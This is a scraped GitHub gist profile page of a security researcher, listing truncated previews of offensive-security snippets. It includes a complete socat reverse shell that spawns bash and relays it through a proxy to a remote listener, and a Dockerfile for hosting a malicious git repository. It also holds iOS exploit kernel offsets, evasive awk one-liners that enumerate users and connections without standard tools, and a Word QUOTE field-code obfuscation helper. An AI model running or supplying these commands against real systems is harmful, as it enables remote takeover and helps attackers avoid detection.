Skip to content

Instantly share code, notes, and snippets.

Etienne Stalmans staaldraad

View GitHub Profile
View README.md

Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/

Doesn't work to use YAML.dump(payload) in the above script. This only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
@staaldraad
staaldraad / Dockerfile
Created Sep 4, 2018
Dockerfile to get a malicious git Repository up and running
View Dockerfile
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
View socat through proxy
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
View keybase.md

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad (https://keybase.io/staaldraad) on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

@staaldraad
staaldraad / async_ios_11_1_2.patch
Last active Mar 27, 2018
Add iPhone 6 symbols along with the symbols @cji added for ipad mini 2.
View async_ios_11_1_2.patch
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
@staaldraad
staaldraad / uid_awk.sh
Created Dec 12, 2017
Get the uid, gid and user groups without touching /etc/passwd or running the `id` command
View uid_awk.sh
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
@staaldraad
staaldraad / awk_netstat.sh
Last active Apr 12, 2019
AWK to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
View awk_netstat.sh
# Gawk version
# Remote
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
View str2quote.py
#!/usr/env/python
print("Converts a string to the {QUOTE} Field code")
st = raw_input("String to convert: ")
v = map(lambda y: "%s"%ord(y),st)
print("{ QUOTE %s }"%' '.join(v))
@staaldraad
staaldraad / oauthServer.go
Last active Dec 21, 2017
A mini OAuth server for Azure
View oauthServer.go
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
View findForms.ps1
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
$fld = $outlook.Session.GetDefaultFolder(6);
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));
You can’t perform that action at this time.